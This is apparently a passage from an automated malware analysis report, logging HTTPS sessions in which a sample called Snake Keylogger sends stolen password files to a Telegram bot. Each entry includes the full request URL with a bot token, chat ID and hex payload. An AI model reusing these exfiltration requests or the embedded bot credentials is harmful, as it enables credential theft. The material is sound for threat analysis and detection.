                            43192.168.2.549817149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:57 UTC72OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756df95b910
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:57 UTC72OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 66 39 35 62 39 31 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756df95b910Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:57 UTC73INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:57 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:57 UTC73INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 39 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66790,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228777,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            44192.168.2.549818149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:57 UTC74OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756dfca2db5
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:57 UTC74OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 66 63 61 32 64 62 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756dfca2db5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:58 UTC75INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:58 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:58 UTC75INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 39 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66792,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228777,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            45192.168.2.549821149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:58 UTC76OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756e00f5165
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:58 UTC76OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 30 30 66 35 31 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756e00f5165Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:58 UTC76INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:58 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:58 UTC77INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 39 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66793,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228778,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            46192.168.2.549822149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:58 UTC77OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756e04626c2
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:58 UTC78OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 30 34 36 32 36 63 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756e04626c2Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:58 UTC78INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:58 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:58 UTC78INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 39 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66794,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228778,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            47192.168.2.549824149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:58 UTC79OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756e081c1a8
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:58 UTC79OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 30 38 31 63 31 61 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756e081c1a8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:59 UTC80INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:59 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:59 UTC80INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 39 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66795,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228779,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            48192.168.2.549825149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:59 UTC81OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756e0bfbe99
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:59 UTC81OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 30 62 66 62 65 39 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756e0bfbe99Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:59 UTC81INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:59 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:59 UTC82INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 39 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66796,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228779,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            49192.168.2.549827149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:59 UTC82OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756e0fb5a83
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:59 UTC83OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 30 66 62 35 61 38 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756e0fb5a83Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:00 UTC83INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:59 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:00 UTC83INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 39 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66797,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228779,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            5192.168.2.549773149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:40 UTC8OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756d57ae485
                            Host: api.telegram.org
                            Content-Length: 504
